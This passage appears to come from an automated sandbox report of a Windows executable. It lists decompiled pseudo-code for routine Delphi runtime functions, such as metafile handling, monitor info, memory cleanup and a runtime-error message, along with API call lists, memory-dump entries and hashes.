                                                                                				}
                                                                                				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
                                                                                				_v54.mm = 8;
                                                                                				_v54.xExt = _v122;
                                                                                				_v54.yExt = _v118;
                                                                                				_v54.hMF = 0;
                                                                                				DeleteEnhMetaFile( *(_t103 + 8));
                                                                                				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                                                                				 *(_t103 + 8) = _t120;
                                                                                				if(_t120 == 0) {
                                                                                					E004200B4();
                                                                                				}
                                                                                				 *((char*)(_t122 + 0x2c)) = 0;
                                                                                				_pop(_t115);
                                                                                				 *[fs:eax] = _t115;
                                                                                				_push(E004224F6);
                                                                                				return E0040274C(_v16);
                                                                                			}


                                                                                APIs
                                                                                • MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422422
                                                                                • MulDiv.KERNEL32(?,000009EC,00000000), ref: 0042243F
                                                                                • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042246B
                                                                                • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042248B
                                                                                • DeleteEnhMetaFile.GDI32(00000016), ref: 004224AC
                                                                                • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 004224BF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: FileMeta$Bits$DeleteHeader
                                                                                • String ID: `
                                                                                • API String ID: 1990453761-2679148245
                                                                                • Opcode ID: abbddc9a927c4a955fefd323be66bda2bbf2c1bae64d8e782b85a21f8be4cac0
                                                                                • Instruction ID: 44c40cd423b67ccf78083ae2a30d6f27b72ddf14c8e4186e4a4d03f68d1a050f
                                                                                • Opcode Fuzzy Hash: abbddc9a927c4a955fefd323be66bda2bbf2c1bae64d8e782b85a21f8be4cac0
                                                                                • Instruction Fuzzy Hash: FC412D75A00218EFDB00DFA9D985AAEB7F9EF48700F51806AF944F7241E7789D40CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E00422380(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                                				intOrPtr* _v8;
                                                                                				int _v12;
                                                                                				BYTE* _v16;
                                                                                				intOrPtr _v18;
                                                                                				signed int _v24;
                                                                                				short _v26;
                                                                                				short _v28;
                                                                                				short _v30;
                                                                                				short _v32;
                                                                                				char _v38;
                                                                                				struct tagMETAFILEPICT _v54;
                                                                                				intOrPtr _v118;
                                                                                				intOrPtr _v122;
                                                                                				struct tagENHMETAHEADER _v154;
                                                                                				intOrPtr _t103;
                                                                                				intOrPtr _t115;
                                                                                				struct HENHMETAFILE__* _t119;
                                                                                				struct HENHMETAFILE__* _t120;
                                                                                				void* _t122;
                                                                                				void* _t123;
                                                                                				void* _t124;
                                                                                				void* _t125;
                                                                                				intOrPtr _t126;
                                                                                
                                                                                				_t124 = _t125;
                                                                                				_t126 = _t125 + 0xffffff68;
                                                                                				_v12 = __ecx;
                                                                                				_v8 = __edx;
                                                                                				_t122 = __eax;
                                                                                				E0042221C(__eax);
                                                                                				 *((intOrPtr*)( *_v8 + 8))(__edi, __esi, __ebx, _t123);
                                                                                				if(_v38 != 0x9ac6cdd7 || E00420F04( &_v38) != _v18) {
                                                                                					E004200B4();
                                                                                				}
                                                                                				_v12 = _v12 - 0x16;
                                                                                				_v16 = E0040272C(_v12);
                                                                                				_t103 =  *((intOrPtr*)(_t122 + 0x28));
                                                                                				 *[fs:eax] = _t126;
                                                                                				 *((intOrPtr*)( *_v8 + 8))( *[fs:eax], 0x4224ef, _t124);
                                                                                				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
                                                                                				if(_v24 == 0) {
                                                                                					_v24 = 0x60;
                                                                                				}
                                                                                				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
                                                                                				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
                                                                                				_v54.mm = 8;
                                                                                				_v54.xExt = 0;
                                                                                				_v54.yExt = 0;
                                                                                				_v54.hMF = 0;
                                                                                				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                                                                				 *(_t103 + 8) = _t119;
                                                                                				if(_t119 == 0) {
                                                                                					E004200B4();
                                                                                				}
                                                                                				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
                                                                                				_v54.mm = 8;
                                                                                				_v54.xExt = _v122;
                                                                                				_v54.yExt = _v118;
                                                                                				_v54.hMF = 0;
                                                                                				DeleteEnhMetaFile( *(_t103 + 8));
                                                                                				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                                                                				 *(_t103 + 8) = _t120;
                                                                                				if(_t120 == 0) {
                                                                                					E004200B4();
                                                                                				}
                                                                                				 *((char*)(_t122 + 0x2c)) = 0;
                                                                                				_pop(_t115);
                                                                                				 *[fs:eax] = _t115;
                                                                                				_push(E004224F6);
                                                                                				return E0040274C(_v16);
                                                                                			}


























                                                                                APIs
                                                                                • MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422422
                                                                                • MulDiv.KERNEL32(?,000009EC,00000000), ref: 0042243F
                                                                                • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042246B
                                                                                • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042248B
                                                                                • DeleteEnhMetaFile.GDI32(00000016), ref: 004224AC
                                                                                • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 004224BF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileMeta$Bits$DeleteHeader
                                                                                • String ID: `
                                                                                • API String ID: 1990453761-2679148245
                                                                                • Opcode ID: 49b8e2e2ab0fed2dd6d06d3fb109950647f96a1ecb2c49f35fcb9d8d4e6d6fe3
                                                                                • Instruction ID: 665570bac44c4c60e8fe7534a9a744b194c8e8f5101b8de97ce5c6e0b6c4a068
                                                                                • Opcode Fuzzy Hash: 49b8e2e2ab0fed2dd6d06d3fb109950647f96a1ecb2c49f35fcb9d8d4e6d6fe3
                                                                                • Instruction Fuzzy Hash: 7F412D75A00218EFDB00DFA9D985AAEB7F9EF48700F51806AF944F7241E7789D40CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 67%
                                                                                			E004264B4(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
                                                                                				void _v20;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				void* _t23;
                                                                                				int _t24;
                                                                                				struct HMONITOR__* _t27;
                                                                                				struct tagMONITORINFO* _t29;
                                                                                				intOrPtr* _t31;
                                                                                
                                                                                				_t29 = _a8;
                                                                                				_t27 = _a4;
                                                                                				if( *0x487ac0 != 0) {
                                                                                					_t24 = 0;
                                                                                					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                                                                						_t29->rcMonitor.left = 0;
                                                                                						_t29->rcMonitor.top = 0;
                                                                                						_t29->rcMonitor.right = GetSystemMetrics(0);
                                                                                						_t29->rcMonitor.bottom = GetSystemMetrics(1);
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						_t31 = _t29;
                                                                                						 *(_t31 + 0x24) = 1;
                                                                                						if( *_t31 >= 0x4c) {
                                                                                							_push("DISPLAY");
                                                                                							_push(_t31 + 0x28);
                                                                                							L00406A28();
                                                                                						}
                                                                                						_t24 = 1;
                                                                                					}
                                                                                				} else {
                                                                                					 *0x487aa4 = E00426184(4, _t23,  *0x487aa4, _t27, _t29);
                                                                                					_t24 = GetMonitorInfoA(_t27, _t29);
                                                                                				}
                                                                                				return _t24;
                                                                                			}













                                                                                APIs
                                                                                • GetMonitorInfoA.USER32(?,?), ref: 004264E5
                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042650C
                                                                                • GetSystemMetrics.USER32 ref: 00426521
                                                                                • GetSystemMetrics.USER32 ref: 0042652C
                                                                                • lstrcpy.KERNEL32(?,DISPLAY), ref: 00426556
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                                                                • String ID: DISPLAY$GetMonitorInfo
                                                                                • API String ID: 1539801207-1633989206
                                                                                • Opcode ID: 74e8bace222dfb2b270db7b4bffcb0b6ca3b8f6e865bad805c7d64f7d561bc5d
                                                                                • Instruction ID: eb29b155447e2ea08417c78262e00809df11af4c5ac13398b32b6bfbf337f6c7
                                                                                • Opcode Fuzzy Hash: 74e8bace222dfb2b270db7b4bffcb0b6ca3b8f6e865bad805c7d64f7d561bc5d
                                                                                • Instruction Fuzzy Hash: 4B1127317003106FD7208F68BC4476BB7E9EF06750F51492EE90997680D374A9808B6C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 47%
                                                                                			E0042665C(intOrPtr _a4, intOrPtr* _a8) {
                                                                                				void _v20;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				void* _t23;
                                                                                				int _t24;
                                                                                				intOrPtr _t26;
                                                                                				intOrPtr _t27;
                                                                                				intOrPtr* _t29;
                                                                                				intOrPtr* _t31;
                                                                                
                                                                                				_t29 = _a8;
                                                                                				_t27 = _a4;
                                                                                				if( *0x487ac2 != 0) {
                                                                                					_t24 = 0;
                                                                                					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                                                                						 *((intOrPtr*)(_t29 + 4)) = 0;
                                                                                						 *((intOrPtr*)(_t29 + 8)) = 0;
                                                                                						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                                                                                						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						_t31 = _t29;
                                                                                						 *(_t31 + 0x24) = 1;
                                                                                						if( *_t31 >= 0x4c) {
                                                                                							_push("DISPLAY");
                                                                                							_push(_t31 + 0x28);
                                                                                							L00406A28();
                                                                                						}
                                                                                						_t24 = 1;
                                                                                					}
                                                                                				} else {
                                                                                					_t26 =  *0x487aac; // 0x42665c
                                                                                					 *0x487aac = E00426184(6, _t23, _t26, _t27, _t29);
                                                                                					_t24 =  *0x487aac(_t27, _t29);
                                                                                				}
                                                                                				return _t24;
                                                                                			}














                                                                                APIs
                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004266B4
                                                                                • GetSystemMetrics.USER32 ref: 004266C9
                                                                                • GetSystemMetrics.USER32 ref: 004266D4
                                                                                • lstrcpy.KERNEL32(?,DISPLAY), ref: 004266FE
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                • String ID: DISPLAY$GetMonitorInfoW$\fB
                                                                                • API String ID: 2545840971-2659345030
                                                                                • Opcode ID: a659e7fc353b91a0559fe6c9e12d237e49ac487b5d8c0679176730f51a712352
                                                                                • Instruction ID: e82b1ccf59c43c2d8bf743638305c59c410ee6f05c7b2395847ba50243c0d1fd
                                                                                • Opcode Fuzzy Hash: a659e7fc353b91a0559fe6c9e12d237e49ac487b5d8c0679176730f51a712352
                                                                                • Instruction Fuzzy Hash: 581106327043105FE7208FA5BC447ABB7E8EB45714F52483FEC4597680E774A944CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 71%
                                                                                			E00401B3C() {
                                                                                				void* _t2;
                                                                                				void* _t3;
                                                                                				void* _t14;
                                                                                				intOrPtr* _t19;
                                                                                				intOrPtr _t23;
                                                                                				intOrPtr _t26;
                                                                                				intOrPtr _t28;
                                                                                
                                                                                				_t26 = _t28;
                                                                                				if( *0x4875bc == 0) {
                                                                                					return _t2;
                                                                                				} else {
                                                                                					_push(_t26);
                                                                                					_push("�1!");
                                                                                					_push( *[fs:edx]);
                                                                                					 *[fs:edx] = _t28;
                                                                                					if( *0x487049 != 0) {
                                                                                						_push(0x4875c4);
                                                                                						L004013D4();
                                                                                					}
                                                                                					 *0x4875bc = 0;
                                                                                					_t3 =  *0x48761c; // 0x70cc70
                                                                                					LocalFree(_t3);
                                                                                					 *0x48761c = 0;
                                                                                					_t19 =  *0x4875e4; // 0x70c354
                                                                                					while(_t19 != 0x4875e4) {
                                                                                						VirtualFree( *(_t19 + 8), 0, 0x8000);
                                                                                						_t19 =  *_t19;
                                                                                					}
                                                                                					E0040143C(0x4875e4);
                                                                                					E0040143C(0x4875f4);
                                                                                					E0040143C(0x487620);
                                                                                					_t14 =  *0x4875dc; // 0x70bd20
                                                                                					while(_t14 != 0) {
                                                                                						 *0x4875dc =  *_t14;
                                                                                						LocalFree(_t14);
                                                                                						_t14 =  *0x4875dc; // 0x70bd20
                                                                                					}
                                                                                					_pop(_t23);
                                                                                					 *[fs:eax] = _t23;
                                                                                					_push(0x401c19);
                                                                                					if( *0x487049 != 0) {
                                                                                						_push(0x4875c4);
                                                                                						L004013DC();
                                                                                					}
                                                                                					_push(0x4875c4);
                                                                                					L004013E4();
                                                                                					return 0;
                                                                                				}
                                                                                			}











                                                                                APIs
                                                                                • RtlEnterCriticalSection.KERNEL32(004875C4,00000000,1!), ref: 00401B69
                                                                                • LocalFree.KERNEL32(0070CC70,00000000,1!), ref: 00401B7B
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,0070CC70,00000000,1!), ref: 00401B9A
                                                                                • LocalFree.KERNEL32(0070BD20,?,00000000,00008000,0070CC70,00000000,1!), ref: 00401BD9
                                                                                • RtlLeaveCriticalSection.KERNEL32(004875C4,00401C19,0070CC70,00000000,1!), ref: 00401C02
                                                                                • RtlDeleteCriticalSection.KERNEL32(004875C4,00401C19,0070CC70,00000000,1!), ref: 00401C0C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                • String ID: 1!
                                                                                • API String ID: 3782394904-1845855088
                                                                                • Opcode ID: c9870644c7d403ba758099fed721d5d9921784339dc3ab848aa4989e93f91077
                                                                                • Instruction ID: caa9c97ba3000af0647512c36d6f90ab019626e33afd24c9466f0402b3c2e7e1
                                                                                • Opcode Fuzzy Hash: c9870644c7d403ba758099fed721d5d9921784339dc3ab848aa4989e93f91077
                                                                                • Instruction Fuzzy Hash: DF115E7464C6406EE711BB66ECB2B2E7A959745708F60887FF500B6AF2D67CD840CB2C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E004041A4(void* __ecx) {
                                                                                				long _v4;
                                                                                				int _t3;
                                                                                
                                                                                				if( *0x487048 == 0) {
                                                                                					if( *0x46b01c == 0) {
                                                                                						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                                                                                					}
                                                                                					return _t3;
                                                                                				} else {
                                                                                					if( *0x48721c == 0xd7b2 &&  *0x487224 > 0) {
                                                                                						 *0x487234();
                                                                                					}
                                                                                					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                                                                                					return WriteFile(GetStdHandle(0xfffffff5), E0040422C, 2,  &_v4, 0);
                                                                                				}
                                                                                			}






                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0046AE10,00000000,?,00404272,?,?,?,00000001,00404312,0040283B,00402883,?,00000000), ref: 004041DD
                                                                                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0046AE10,00000000,?,00404272,?,?,?,00000001,00404312,0040283B,00402883), ref: 004041E3
                                                                                • GetStdHandle.KERNEL32(000000F5,0040422C,00000002,0046AE10,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0046AE10,00000000,?,00404272), ref: 004041F8
                                                                                • WriteFile.KERNEL32(00000000,000000F5,0040422C,00000002,0046AE10,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0046AE10,00000000,?,00404272), ref: 004041FE
                                                                                • MessageBoxA.USER32 ref: 0040421C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: FileHandleWrite$Message
                                                                                • String ID: Error$Runtime error at 00000000
                                                                                • API String ID: 1570097196-2970929446
                                                                                • Opcode ID: 7542210bf09bc892d3483cc914aad794224dab76ed301de357ef70916d6eaf62
                                                                                • Instruction ID: 3cda8e2fd8faf604d14361e06e5260565932c3c5a82abd22b22224aa19730b8a
                                                                                • Opcode Fuzzy Hash: 7542210bf09bc892d3483cc914aad794224dab76ed301de357ef70916d6eaf62
                                                                                • Instruction Fuzzy Hash: 55F0C2B169434035E62063A46D06F5E26488385B59F204EFFB320F80E293BC98C4476E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 39%
                                                                                			E00442D8C(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr _v12;
                                                                                				char _v28;
                                                                                				char _v44;
                                                                                				void* __edi;
                                                                                				void* __ebp;
                                                                                				void* _t46;
                                                                                				void* _t57;
                                                                                				intOrPtr _t85;
                                                                                				intOrPtr _t96;
                                                                                				void* _t117;
                                                                                				void* _t118;
                                                                                				void* _t127;
                                                                                				struct HDC__* _t136;
                                                                                				struct HDC__* _t137;
                                                                                				intOrPtr* _t138;
                                                                                				void* _t139;
                                                                                
                                                                                				_t119 = __ecx;
                                                                                				_t135 = __ecx;
                                                                                				_v8 = __edx;
                                                                                				_t118 = __eax;
                                                                                				_t46 = E00442554(__eax);
                                                                                				if(_t46 != 0) {
                                                                                					_t142 = _a4;
                                                                                					if(_a4 == 0) {
                                                                                						__eflags =  *((intOrPtr*)(_t118 + 0x54));
                                                                                						if( *((intOrPtr*)(_t118 + 0x54)) == 0) {
                                                                                							_t138 = E00423960(1);
                                                                                							 *((intOrPtr*)(_t118 + 0x54)) = _t138;
                                                                                							E00424D78(_t138, 1);
                                                                                							 *((intOrPtr*)( *_t138 + 0x40))();
                                                                                							_t119 =  *_t138;
                                                                                							 *((intOrPtr*)( *_t138 + 0x34))();
                                                                                						}
                                                                                						E0041F338( *((intOrPtr*)(E00423F28( *((intOrPtr*)(_t118 + 0x54))) + 0x14)), _t119, 0xffffff, _t135, _t139, __eflags);
                                                                                						E00412984(0,  *((intOrPtr*)(_t118 + 0x34)), 0,  &_v44,  *((intOrPtr*)(_t118 + 0x30)));
                                                                                						_push( &_v44);
                                                                                						_t57 = E00423F28( *((intOrPtr*)(_t118 + 0x54)));
                                                                                						_pop(_t127);
                                                                                						E0041F9D0(_t57, _t127);
                                                                                						_push(0);
                                                                                						_push(0);
                                                                                						_push(0xffffffff);
                                                                                						_push(0);
                                                                                						_push(0);
                                                                                						_push(0);
                                                                                						_push(0);
                                                                                						_push(E0041FDC4(E00423F28( *((intOrPtr*)(_t118 + 0x54)))));
                                                                                						_push(_v8);
                                                                                						_push(E00442728(_t118));
                                                                                						L004260DC();
                                                                                						E00412984(_a16, _a16 +  *((intOrPtr*)(_t118 + 0x34)), _a12,  &_v28, _a12 +  *((intOrPtr*)(_t118 + 0x30)));
                                                                                						_v12 = E0041FDC4(E00423F28( *((intOrPtr*)(_t118 + 0x54))));
                                                                                						E0041F338( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0x80000014, _t135, _t139, __eflags);
                                                                                						_t136 = E0041FDC4(_t135);
                                                                                						SetTextColor(_t136, 0xffffff);
                                                                                						SetBkColor(_t136, 0);
                                                                                						_push(0xe20746);
                                                                                						_push(0);
                                                                                						_push(0);
                                                                                						_push(_v12);
                                                                                						_push( *((intOrPtr*)(_t118 + 0x30)));
                                                                                						_push( *((intOrPtr*)(_t118 + 0x34)));
                                                                                						_push(_a12 + 1);
                                                                                						_t85 = _a16 + 1;
                                                                                						__eflags = _t85;
                                                                                						_push(_t85);
                                                                                						_push(_t136);
                                                                                						L00406A30();
                                                                                						E0041F338( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0x80000010, _t135, _t139, _t85);
                                                                                						_t137 = E0041FDC4(_t135);
                                                                                						SetTextColor(_t137, 0xffffff);
                                                                                						SetBkColor(_t137, 0);
                                                                                						_push(0xe20746);
                                                                                						_push(0);
                                                                                						_push(0);
                                                                                						_push(_v12);
                                                                                						_push( *((intOrPtr*)(_t118 + 0x30)));
                                                                                						_push( *((intOrPtr*)(_t118 + 0x34)));
                                                                                						_push(_a12);
                                                                                						_t96 = _a16;
                                                                                						_push(_t96);
                                                                                						_push(_t137);
                                                                                						L00406A30();
                                                                                						return _t96;
                                                                                					}
                                                                                					_push(_a8);
                                                                                					_push(E00442350(_t142));
                                                                                					E00442D64(_t118, _t142);
                                                                                					_push(E00442350(_t142));
                                                                                					_push(0);
                                                                                					_push(0);
                                                                                					_push(_a12);
                                                                                					_push(_a16);
                                                                                					_push(E0041FDC4(__ecx));
                                                                                					_push(_v8);
                                                                                					_t117 = E00442728(_t118);
                                                                                					_push(_t117);
                                                                                					L004260DC();
                                                                                					return _t117;
                                                                                				}
                                                                                				return _t46;
                                                                                			}





















                                                                                APIs
                                                                                • 73452430.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 00442DEB
                                                                                • 73452430.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00442E8C
                                                                                • SetTextColor.GDI32(00000000,00FFFFFF), ref: 00442ED9
                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 00442EE1
                                                                                • 72E897E0.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746,00000000,00000000,00000000,00FFFFFF,00000000,?,00000000), ref: 00442F06
                                                                                  • Part of subcall function 00442D64: 73452240.COMCTL32(00000000,?,00442DC5,00000000,?), ref: 00442D7A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: 73452430Color$73452240E897Text
                                                                                • String ID:
                                                                                • API String ID: 3108427945-0
                                                                                • Opcode ID: f9827d315cdbc4e10fc9f6f4317652b6d712c7bab38ee9153700b76ea893cef0
                                                                                • Instruction ID: 8c7c3c46afd78b8adb657da2d6ce0c39d83e9d96557bbb21b825c40a06f345e7
                                                                                • Opcode Fuzzy Hash: f9827d315cdbc4e10fc9f6f4317652b6d712c7bab38ee9153700b76ea893cef0
                                                                                • Instruction Fuzzy Hash: 3F512B71700115AFDB40EF6DDD82F9E37E8AF09304F50116AF905EB286CA78EC468B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E0042E254(void* __eax, void* __ecx, void* __edx) {
                                                                                				signed int _v8;
                                                                                				signed int _v12;
                                                                                				signed int _v16;
                                                                                				intOrPtr _v20;
                                                                                				signed int _v24;
                                                                                				struct HDWP__* _v28;
                                                                                				int _v32;
                                                                                				char _v36;
                                                                                				struct tagTEXTMETRICA _v92;
                                                                                				void* __ebx;
                                                                                				void* __ebp;
                                                                                				struct HDC__* _t85;
                                                                                				void* _t88;
                                                                                				void* _t111;
                                                                                				char _t115;
                                                                                				intOrPtr* _t117;
                                                                                				void* _t142;
                                                                                				signed int _t145;
                                                                                				long _t146;
                                                                                				signed int _t156;
                                                                                				intOrPtr _t158;
                                                                                				struct HDC__* _t173;
                                                                                				int _t174;
                                                                                				void* _t177;
                                                                                				void* _t179;
                                                                                				intOrPtr _t180;
                                                                                				intOrPtr _t186;
                                                                                
                                                                                				_t177 = _t179;
                                                                                				_t180 = _t179 + 0xffffffa8;
                                                                                				_t142 = __eax;
                                                                                				_t85 =  *(__eax + 0x210);
                                                                                				if( *((intOrPtr*)(_t85 + 8)) == 0 ||  *((char*)(__eax + 0x220)) != 0) {
                                                                                					return _t85;
                                                                                				} else {
                                                                                					_push(0);
                                                                                					L00406E20();
                                                                                					_t173 = _t85;
                                                                                					_t88 = SelectObject(_t173, E0041EB60( *((intOrPtr*)(__eax + 0x68)), __eax, __ecx));
